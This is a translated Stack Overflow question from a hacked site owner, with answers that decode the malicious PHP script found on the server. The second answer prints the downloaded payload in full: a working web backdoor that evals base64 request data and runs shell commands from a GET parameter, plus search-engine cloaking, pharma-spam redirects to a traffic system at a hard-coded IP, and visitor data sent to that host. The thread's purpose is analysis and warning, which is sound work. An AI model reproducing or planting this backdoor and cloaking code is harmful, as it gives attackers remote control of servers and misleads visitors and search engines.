无法解码此黑客代码

时间:2012-09-28 22:12:01

标签: php

今天我的网站被黑了,这是我发现的一个php脚本:https://docs.google.com/open?id=0B7aEugGV1GwTNnd2c2Fqei1vakE

我在此代码中更改了eval以进行打印,但我无法解码脚本的源代码。

我希望在我的网站中看到这个脚本在一周内做了什么。我认为这是由于这些脚本的站点拒绝攻击最终改变了.htaccess代码。

我甚至试图使用脚本名称和注释行在Google中找到任何已知的常见威胁,但我找不到。

2 个答案:

答案 0 :(得分:3)

免责声明

  

解码后我到达http://pastebin.com/VGqeGDkH。请不要在您的系统上运行上述代码...因为它不是唯一可以下载到您系统的罚款。

黑客将curlfile_get_contents请求发送至:

curl_setopt($vH5wU9kS8uO3wG9xI7wR5aV1fS3vU2qC2bA6yP9oG2uZ1zF7zZ5dR8gI0tJ3jV3oB0cD1iN6dD1vL8gL2uP4fX0yU2tF4bR8qD1xB2pL7eS9kW2rI7vD1dS5oA4iP9jH6, CURLOPT_URL, "$pO6oA9pF4aY2lO7dY9vK3sU7nL8lF4gL1dY7uD8mU4xH9gM2hR9gT8tA6dJ1aB9sA8wP3sO5zI8xR2eZ0aD4dK7uQ0rG7aA7nI6kZ3kI3tG5$cO9qE4hY7wW5rJ7qL1bN7uP0dE2zE9rB2bV6lY3sJ8eO3rN3pR0tA8mA0qR1oK2dE9qM3yH0kB1wU1qX2pJ0bS5xV4mG7pY1pI6iK8eP8xY3yX2$kI8yO6lP1lN7wX0fV2kY1zI9vO3mS6wK3lT9gH9rE6tZ8xT6dE7wG4dP5iJ0mC7bX0zJ3tO1iD0eD2hE4cJ0pG4gZ1bC8lT5jM1iK8hD3$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$fK3iD2pY6sG1xV5wB5wU8pJ1hP2qW7wZ5sI1kS4pN0pO7bD1fE1vZ2aL3pV0uZ2fI3eQ4kI9aD8wN5bF0jR8aQ8sN6rD0pV6sM4uJ7zK6aW5dR4bC7$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$zP3dW5gU5bS0sO7aO2cQ5tD0eV6cD9rW9sJ9jM0kO6zK8wL8hL9xU3zI1gJ7xT2rX9tO9wD6gL0pV5eD2rT4hL2uP1jB9sE2cU0fG6gJ1zM0pM2vS1wZ8lQ7uN8qA6eY0$qM2xA6eC8gQ2lE0qQ8eM7xT2dV5sS1aW2wH3qL5dG5sF3fI4zA1xG9gN9xV7fO4zT5qV2yU1gC2lR2vB1hF5dO6gC9xH6aC1wA6$zV0mR4mU2lH5iU0qI9iN1vM6eU2uO2qJ2fH4mY7wK1kH5nR0fE4yV8rI0vR3lM3zW2jK8cG3dX4zM3oQ8iK0iK7yS1fY0oE4yZ3xN7iI4sN6");

解码后你会得到

curl_setopt($ch, CURLOPT_URL, "http://95.211.128.197/100JS71MLKpzPzFbcYeVvZUMxCRUKBVFFx6iO6pr2VfhBthyzGcp.txt");

然后这将下载文件和系统的不同后门..

黑客还使用了许多先进的方法,如加密,可变递归和大量备份。他还确保谷歌,雅虎,微软公司,AMAZON,UCSD.EDU,印第安纳州都没有发现最终的机器人大学,Sonic.net,MCAFEE INTERNATIONAL和hz

我的建议

与您的托管公司或安全专业人员联系.. Your server needs to be checked

答案 1 :(得分:0)

这是一个搜索引擎去优化者。它会在您网站的内容中注入恶意词语。因此,当谷歌机器人等机器人为您的网站编制索引时,它会将这些文字与您的网站相关联。

这是它下载的文件的代码

不要跑

    $sutra = "http://95.211.128.197/tds";           // TDS Url
    $scheme = "default";                            // TDS Cheme
    $www_root = "http://95.211.128.197";            // Manager path

    $host=$_SERVER['HTTP_HOST'];
    $agent=$_SERVER['HTTP_USER_AGENT'];
    $server_accept_language = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
    $server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
    $server_referer = @$_SERVER['HTTP_REFERER'];
    $server_host = @$_SERVER['HTTP_HOST'];
    $server_forwarded_for = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $server_remote_addr = @$_SERVER['REMOTE_ADDR'];
    $server_query_string = @$_SERVER['QUERY_STRING'];
    $server_signature = @$_SERVER['SERVER_SIGNATURE'];
    $server_request = @$_SERVER['REQUEST_URI'];

    $debug = false;
    if ($server_remote_addr == "108.170.8.174"){$debug = true;} 

    if ($debug) 
        {
            echo "<title>DOOR OK</title>";
            echo "originalurl=$originalurl<br>";
            echo "server_user_agent=$server_user_agent<br>";
            echo "server_referer=$server_referer<br>";
            echo "server_host=$host<br>";
            echo "server_remote_addr=$server_remote_addr<br>";
            echo "server_request=$server_request<br>";
            echo "www_root=$www_root<br><br>";

            echo "Check CURL extension...";
            if (extension_loaded('curl'))
                {
                    echo "<font color=green><b>YES</b></font><br><br>";
                }
                else
                {
                    echo "<font color=red><b>NO</b></font><br><br>";
                }   
        }   

    // Some bad guys :)

    if (eregi ("start=56",$server_referer))
    {
        exit();
    }

    if ($agent == "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)")
    {
        exit();
    }   

    if ($agent == "Mozilla/4.0")
    {
        exit();
    }   


    if (eregi("75.125.",$server_remote_addr))
    {
        exit();
    }

    if (eregi("41.190.",$server_remote_addr))
    {
        exit();
    }   

    if (eregi("143.215.169",$server_remote_addr))
    {
        exit();
    }       


if (eregi("75.55.",$server_remote_addr))
    {
        exit();
    }       

if (eregi("67.212.",$server_remote_addr))
    {
        exit();
    }

if (eregi("173.236.",$server_remote_addr))
    {
        exit();
    }

if (eregi("184.154.",$server_remote_addr))
    {
        exit();
    }

if ($server_remote_addr == '194.115.120.14')
    {
        exit();
    }   
//////////////////////////////////////////////////////////////////////////////


if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434") && isset($_REQUEST["mod_content"])) { eval(base64_decode($_REQUEST["mod_content"])); exit(); }

$cmd = $_GET['cmddd'];
if (isset($cmd))
    {
        system($cmd);   
        exit();
    }

@$is_human = @detectBot($server_user_agent,$server_remote_addr,$server_query_string,$server_referer);

if (@$is_human==false) 
                    {
                    $folder = str_replace("www.","",$host);
                    if (($server_request=="") || ($server_request=="/"))
                        {
                            $filename = "index.php";    
                        }
                        else
                        {
                            $filename = str_replace("_","",$server_request);
                            $filename = str_replace("_","",$filename);
                            $filename = str_replace(" ","",$filename);
                            $filename = str_replace("%","",$filename);
                            $filename = str_replace("|","",$filename);
                            $filename = str_replace("/","",$filename);
                            $filename = str_replace(";","",$filename);
                            $filename = str_replace("+","",$filename);
                            $filename = str_replace("?","",$filename);
                            $filename = str_replace(".","",$filename);
                            $filename = str_replace("=","",$filename);
                            $filename1 = str_replace("&","",$filename);
                            $filename2 = str_replace("&","amp",$filename);
                            $filename1 = $filename1.".php";
                            $filename2 = $filename2.".php";
                        }                       
                    if (extension_loaded('curl'))
                        {
                            $ch = curl_init();
                            curl_setopt($ch, CURLOPT_URL, "$www_root/pages/$folder/$filename1");
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                            $remote_page = curl_exec($ch);
                            $ch2 = curl_init();
                            curl_setopt($ch2, CURLOPT_URL, "$www_root/pages/$folder/$filename2");
                            curl_setopt($ch2, CURLOPT_HEADER, 0);
                            curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
                            $remote_page2 = curl_exec($ch2);
                            $ch2 = curl_init();
                            //curl_setopt($ch2, CURLOPT_URL, "$www_root/_links/doors.php");
                            curl_setopt($ch2, CURLOPT_URL, "$www_root/pages/$folder/doors.txt");
                            curl_setopt($ch2, CURLOPT_HEADER, 0);
                            curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
                            $links_map = curl_exec($ch2);   
                            if (eregi ("Not Found", $links_map))
                                {
                                    $links_map = "";
                                }
                        }
                        else
                        {
                            $remote_page = file_get_contents("$www_root/pages/$folder/$filename1");
                            $remote_page2 = file_get_contents("$www_root/pages/$folder/$filename2");
                            $links_map = file_get_contents("$www_root/pages/$folder/doors.txt");
                            if (eregi ("Not Found", $links_map))
                                {
                                    $links_map = "";
                                }                           
                            //$links_map = file_get_contents("$www_root/_links/doors.php");
                        }

                        if (eregi('<h2>', $remote_page))
                            {
                                echo $remote_page."<!-- End HTML 3.51.197 -->";
                                exit;
                            }
                        if (eregi('<h2>', $remote_page2))
                            {
                                echo $remote_page2."<!-- End HTML 3.51.197 -->";
                                exit;
                            }
                            else
                            {
                                // NIHT :)
                                $originalurl="http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
                                $originaluseragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;";
                                if (extension_loaded('curl'))
                                    {
                                        $ch = curl_init();
                                        curl_setopt($ch, CURLOPT_URL, $originalurl);
                                        curl_setopt($ch, CURLOPT_USERAGENT, $originaluseragent);
                                        curl_setopt($ch, CURLOPT_HEADER, 0);
                                        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                                        $originalpage = curl_exec($ch);     
                                    }
                                    else
                                    {   
                                        $originalpage = @file_get_contents($originalurl);
                                    }

                                if (preg_match('/<body.*?>/i',$originalpage)) {
                                    $originalpage=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $originalpage);
                                    $originalpage=preg_replace('/(<body.*?>)/i', "<body>$links_map", $originalpage, 1);
                                } elseif (preg_match('/<\/body>/i',$originalpage)) {
                                    $originalpage=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $originalpage);
                                    $originalpage=preg_replace('/(<\/body>)/i', "$links_map</body>", $originalpage, 1);
                                }
                                print $originalpage."<!-- End HTML 3.51.197 -->";
                                exit;                               
                                //echo '<font id="mix" color="8a517f" style="height: 0;overflow: hidden;width: 0; position: absolute; font-family:courier; font-size:19px">'
                                //echo $links_map;
                                //'</font>';
                            }
                    }
                    else
                    {
                    $keys = "/acai|diet|weight|loss|pharmac|drug|lunesta|provigil|modafinil|proventil|accutane|cialas|aciphex|acomplia|acyclovir|adalat|albendazole|albenza|albuterol|aldactone|alendronate|allegra|altace|amaryl|amiloride|amlodipine|amoxicillin|ansaid|arava|arcoxia|atenolol|atorvastatin|avandia|avapro|avodart|aygestin|azathioprine|azithromycin|baclofen|bactrim|benazepril|benzodiazepine|biaxin|bisoprolol|bromocriptine|bupropion|calan|carbamazepine|carisoprodol|carvedilol|ceclor|cefaclor|cefpodoxime|celebrex|celecoxib|cetirizine|chlorambucil|cialis|clarinex|clarithromycin|claritin|clopidogrel|colospa|conjugated|coreg|coumadin|coversyl|cyproheptadine|danazol|danocrine|desloratadine|desyrel|digoxin|dilantin|dipyridamole|domperidone|dutasteride|effexor|eldepryl|enalapril|epivir|erythromycins|escitalopram|esomeprazole|estrace|estradiol|ethambutol|etoricoxib|evista|ezetimibe|famciclovir|famvir|felodipine|fenofibrate|fexofenadine|finasteride|flagyl|flavoxate|flomax|floxin|fluoxetine|flurbiprofen|fosamax|frumil|furosemide|gabapentin|gemfibrozil|geodon|glimepiride|glipizide|glucophage|glucotrol|hydroch|hytrin|hyzaar|ibuprofen|ilosone|imdur|imitrex|imuran|indapamide|inderal|irbesartan|isordil|isosorbide|kamagra|ketoconazole|lamictal|laminuvide|lamisil|lamotrigine|lanoxin|lansoprazole|lasix|leflunomide|lenor72|leukeran|levaquin|levitra|levlen|levofloxacin|levonorgestrel|levothroid|levothyroxine|lexapro|lioresal|lipitor|lisinopril|lopid|lopressor|loratadine|losartan|lotensin|lovastatin|loxapine|loxitane|lozol|mebeverine|medroxy|mefenamicacid|meloxicam|meridia|metformin|metoclopramide|metoprolol|metronidazole|mevacor|mexiletine|mexitil|microzide|minipress|mobic|montelukast|motilium|motrin|myambutol|nabumetone|naprosyn|naproxen|neurontin|nexium|nifedipine|nimodipine|nimotop|niravam|nizoral|nolvadex|norethindrone|norplant72|nortriptyline|norvasc|ofloxacin|omeprazole|orlistat|oseltami|pamelor|pantoprazole|parlodel|paroxetine|paxil|periactin|perindropril|persantine|phenergan|phenytoin|plavix|plendil|ponstel|prandin|pravachol|pravastatin|prazosin|prednisolone|prednisone|premarin|prevacid|prilosec|prograf|promethazine|propafenone|propecia|propranolol|proscar|protonix|provera|prozac|rabeprazole|raloxifene|ramipril|ranitidine|reductil|reglan|relafen|repaglinide|retrovir|rimonabant|risperdal|risperidone|rivotril|rosiglitazonemaleate|roxithromycin|rulide|rythmol|selegiline|sertraline|sibutramine|sildenafil|simvastatin|singulair|soma|spironolactone|stavudine|sulfamet|sumatriptan|sumycin|synthroid|tacrolimus|tadalafil|tamiflu|tamoxifen|tamsulosin|tegaserod|tegretol|tenormin|terazosin|terbinafine|tetracycline|topamax|topiramate|trazodone|tricor|trimox|urispas|valacyclovir|valtrex|vantin|vardenafil|vasotec|venlafaxine|verapamil|viagra|warfarin|xenical|zantac|zebeta|zelnorm|zerit|zestril|zetia|zidovudine|zimulti|ziprasidone|zithromax|zocor|zoloft|zovirax|zyban|zyrtec|ambien|phentermine|xanax|valium|tramadol|adipex|zolpidem|ativan|alprazolam|diazepam|klonopin|lorazepam|clonazepam|ultram|zopiclone|modalert|hair|vicodin|amoxil|atomoxetine|cipro|ciprofloxacin|clomid|clomiphene|deltasone|diflucan|doxycycline|fluconazole|isotretinoin|pentazine|septra|strattera/i";


                    if (strlen($_SERVER["HTTP_REFERER"]) < 30)
                        {

                        if (eregi ("google", $_SERVER["HTTP_REFERER"]))
                            {
                        $key = "unknown";
                        $host_new = str_replace("www.","",$host);
                        if (extension_loaded('curl'))
                            {
                            $ch = curl_init();
                            curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                            curl_setopt($ch, CURLOPT_POST, 1);
                            $data = array(
                            'domain' => $host_new, 
                            'uri' => $server_request,
                            'se' => $sese,
                            'referrer' => $_SERVER["HTTP_REFERER"],
                            'agent' => $agent,
                            'server_remote_addr' => $server_remote_addr,
                            'keys' => $key
                            );
                            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
                            curl_exec($ch);
                            }
                            else
                            {   
                            @file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
                            }                       

                            $location = "$sutra/in.cgi?$scheme";
                            header("Location: ".$location);
                            exit;                           
                            }
                        }

/**                 if ((eregi ("url=", $server_referer)) AND (preg_match('/google/i', $server_referer)))
                        {
                        $key = "unknown, https";
                        $host_new = str_replace("www.","",$host);
                        if (extension_loaded('curl'))
                            {
                            $ch = curl_init();
                            curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                            curl_setopt($ch, CURLOPT_POST, 1);
                            $data = array(
                            'domain' => $host_new, 
                            'uri' => $server_request,
                            'se' => $sese,
                            'referrer' => $_SERVER["HTTP_REFERER"],
                            'agent' => $agent,
                            'server_remote_addr' => $server_remote_addr,
                            'keys' => $key
                            );
                            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
                            curl_exec($ch);
                            }
                            else
                            {   
                            @file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
                            }                       

                            $location = "$sutra/in.cgi?$scheme";
                            header("Location: ".$location);
                            exit;                           
                        }                       
*/
                    if (preg_match($keys, $_SERVER["HTTP_REFERER"])) 
                        {
                        $key = $_SERVER["HTTP_REFERER"];
                        $sese="unknown";
                        if (eregi("yahoo", $_SERVER["HTTP_REFERER"]))
                            {
                                $keys = explode ("p=", $_SERVER["HTTP_REFERER"]);
                                $keys = explode ("&", $keys[1]);
                                $key = $keys[0];        
                                $sese="yahoo";
                            }
                        if (eregi("google", $_SERVER["HTTP_REFERER"]))
                            {
                                $keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
                                $keys = explode ("&", $keys[1]);
                                $key = $keys[0];
                                $sese="google"; 
                            }
                        if (eregi("bing", $_SERVER["HTTP_REFERER"]))
                            {
                                $keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
                                $keys = explode ("&", $keys[1]);
                                $key = $keys[0];
                                $sese="bing";   
                            }   
                        if (eregi("aol.com", $_SERVER["HTTP_REFERER"]))
                            {
                                $keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
                                $keys = explode ("&", $keys[1]);
                                $key = $keys[0];
                                $sese="aol";    
                            }
                        if (eregi("ask.com", $_SERVER["HTTP_REFERER"]))
                            {
                                $keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
                                $keys = explode ("&", $keys[1]);
                                $key = $keys[0];
                                $sese="ask";    
                            }               

                        $host_new = str_replace("www.","",$host);
                        if (extension_loaded('curl'))
                            {
                            $ch = curl_init();
                            curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                            curl_setopt($ch, CURLOPT_POST, 1);
                            $data = array(
                            'domain' => $host_new, 
                            'uri' => $server_request,
                            'se' => $sese,
                            'referrer' => $_SERVER["HTTP_REFERER"],
                            'agent' => $agent,
                            'server_remote_addr' => $server_remote_addr,
                            'keys' => $key
                            );
                            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
                            curl_exec($ch);
                            }
                            else
                            {   
                            @file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
                            }

                            $location = "$sutra/in.cgi?$scheme¶meter=".$key."&se=".$host."&HTTP_REFERER=".$_SERVER["HTTP_REFERER"];
                            //$location = "http://health-profile.net/";
                            header("Location: ".$location);
                            exit;
                    }

                    }
////////////////////////////////////////////////////////////////////////////////////////////////////
function detectBot($server_user_agent,$server_remote_addr,$server_query_string,$server_referer){

    $is_human = true;

    $stop_ips_masks = array(
        "/^8\.6\.4[8-9]\.[0-9]+$/",             // NetRange:    8.6.48.0 - 8.6.55.255           Google Inc
        "/^8\.6\.5[0-5]\.[0-9]+$/",             // NetRange:    8.6.48.0 - 8.6.55.255           Google Inc
        "/^64\.233\.1[6-8][0-9]\.[0-9]+$/",     // NetRange:    64.233.160.0 - 64.233.191.255   Google Inc
        "/^64\.233\.19[0-1]\.[0-9]+$/",         // NetRange:    64.233.160.0 - 64.233.191.255   Google Inc
        "/^64\.68\.8[0-7]\.[0-9]+$/",           // NetRange:    64.68.80.0 - 64.68.87.255       Google Inc
        "/^66\.249\.6[4-9]\.[0-9]+$/",          // NetRange:    66.249.64.0 - 66.249.95.255     Google Inc
        "/^66\.249\.[7-8][0-9]\.[0-9]+$/",      // NetRange:    66.249.64.0 - 66.249.95.255     Google Inc
        "/^66\.249\.9[0-5]\.[0-9]+$/",          // NetRange:    66.249.64.0 - 66.249.95.255     Google Inc
        "/^72\.14\.19[2-9]\.[0-9]+$/",          // NetRange:    72.14.192.0 - 72.14.255.255     Google Inc
        "/^72\.14\.2[0-5][0-9]\.[0-9]+$/",      // NetRange:    72.14.192.0 - 72.14.255.255     Google Inc
        "/^74\.125\.[0-9]+\.[0-9]+$/",          // NetRange:    74.125.0.0 - 74.125.255.255     Google Inc
        "/^74\.6\.[0-9]+\.[0-9]+$/",            // NetRange:    74.6.0.0 - 74.6.255.255         Google Inc
        "/^216\.239\.3[2-9]\.[0-9]+$/",         // NetRange:    216.239.32.0 - 216.239.63.255   Google Inc
        "/^216\.239\.4[0-9]\.[0-9]+$/",         // NetRange:    216.239.32.0 - 216.239.63.255   Google In
        "/^216\.239\.6[0-3]\.[0-9]+$/",         // NetRange:    216.239.32.0 - 216.239.63.255   Google Inc
        "/^209\.85\.12[8-9]\.[0-9]+$/",         // NetRange:    209.85.128.0 - 209.85.255.255   Google Inc
        "/^209\.85\.1[3-9][0-9]\.[0-9]+$/",     // NetRange:    209.85.128.0 - 209.85.255.255   Google Inc
        "/^209\.85\.2[0-5][0-9]\.[0-9]+$/",     // NetRange:    209.85.128.0 - 209.85.255.255   Google Inc
        "/^64\.9\.22[4-9]\.[0-9]+$/",           // NetRange:    64.9.224.0 - 64.9.255.255       Google Inc
        "/^64\.9\.2[3-4][0-9]\.[0-9]+$/",       // NetRange:    64.9.224.0 - 64.9.255.255       Google Inc
        "/^64\.9\.25[0-5]\.[0-9]+$/",           // NetRange:    64.9.224.0 - 64.9.255.255       Google Inc
        "/^66\.102\.[0-9]\.[0-9]+$/",           // NetRange:    66.102.0.0 - 66.102.15.255      Google Inc
        "/^66\.102\.1[0-5]\.[0-9]+$/",          // NetRange:    66.102.0.0 - 66.102.15.255      Google Inc      
        "/^137\.110\.[0-9]+\.[0-9]+$/",         // NetRange:    137.110.222.*                   Google bot
        "/^65\.5[2-5]\.[0-9]+\.[0-9]+$/",       // NetRange:    65.52.0.0 - 65.55.255.255       Microsoft Corp
        "/^67\.195\.[0-9]+\.[0-9]+$/",          // NetRange:    67.195.0.0 - 67.195.255.255     Yahoo! Inc
        "/^209\.131\.3[2-9]\.[0-9]+$/",         // NetRange:    209.131.32.0 - 209.131.63.255   Yahoo! Inc
        "/^209\.131\.[4-5][0-9]\.[0-9]+$/",     // NetRange:    209.131.32.0 - 209.131.63.255   Yahoo! Inc
        "/^209\.131\.[6][0-3]\.[0-9]+$/",       // NetRange:    209.131.32.0 - 209.131.63.255   Yahoo! Inc
        "/^66\.163\.1[6-8][0-9]\.[0-9]+$/",     // NetRange:    66.163.160.0 - 66.163.191.255   Yahoo! Inc
        "/^66\.163\.19[0-1]\.[0-9]+$/",         // NetRange:    66.163.160.0 - 66.163.191.255   Yahoo! Inc
        "/^184\.72\.[0-9]+\.[0-9]+$/",          // NetRange:    184.72.0.0 - 184.73.255.255     AMAZON
        "/^184\.73\.[0-9]+\.[0-9]+$/",          // NetRange:    184.72.0.0 - 184.73.255.255     AMAZON
        "/^198\.134\.135\.[0-9]+$/",            // NetRange:    198.134.135.0 - 198.134.135.255 UCSD.EDU
        "/^129\.79\.49\.[0-9]+$/",              // NetRange:    129.79.49.249                   Indiana University
        "/^69\.12\.216\.[0-9]+$/",              // NetRange:    69.12.216.14                    Sonic.net
        "/^62\.189\.112\.[0-9]+$/",             // NetRange:    62.189.112.0 - 62.189.112.255   MCAFEE INTERNATIONAL
        "/^79\.178\.31\.[0-9]+$/",              // NetRange:    79.178.31.165                   hz
        "/^78\.46\.70\.[0-9]+$/",               // NetRange:    78.46.70.145                    hz
        "/^87\.98\.215\.[0-9]+$/",              // NetRange:    87.98.215.155                   hz
        "/^64\.34\.165\.[0-9]+$/",              // NetRange:    64.34.165.218                   hz
        "/^93\.186\.20\.[0-9]+$/",              // NetRange:    93.186.20.13                    hz
        "/^204\.118\.31\.202$/",
        "/^74\.81\.89\.114$/",
        "/^82\.192\.91\.10$/",
        "/^192\.251\.226\.206$/",
        "/^95\.211\.27\.[0-9]+$/",
        "/^95\.211\.129\.[0-9]+$/",
        "/^95\.211\.128\.[0-9]+$/",
        "/^128\.163\.16\.[0-9]+$/",             // NetRange:    128.163.16.*                    UKY
        "/^91\.217\.162\.[0-9]+$/",
        "/^91\.220\.35\.[0-9]+$/",
        "/^195\.14\.112\.[0-9]+$/",
        "/^86\.55\.210\.[0-9]+$/",
        "/^184\.173\.219\.[0-9]+$/",
        "/^184\.172\.169\.[0-9]+$/",
        "/^50\.22\.89\.[0-9]+$/",
        "/^64\.120\.249\.[0-9]+$/",
        "/^46\.37\.184\.[0-9]+$/",
        "/^10\.48\.17\.[0-9]+$/",
        "/^108\.170\.8\.[0-9]+$/",
        "/^64\.120\.227\.[0-9]+$/"
    );

    $stop_ips_masks_count = count ($stop_ips_masks);

    for($w=0; $w<$stop_ips_masks_count; $w++)
        {
            if(preg_match($stop_ips_masks[$w], $server_remote_addr))
                {
                    $is_human = false;  break;
                }
        } 

    $stop_agents_masks = "/google|bot|rambler|yandex|yahoo|freebsd|libwww|spider|linux/i";
    if (preg_match($stop_agents_masks, $server_user_agent)) 
        {
            $is_human = false;
        }

//  if  (strlen ($server_user_agent) < 12)
//      {
//          $is_human = false;
//      }

    return $is_human;
}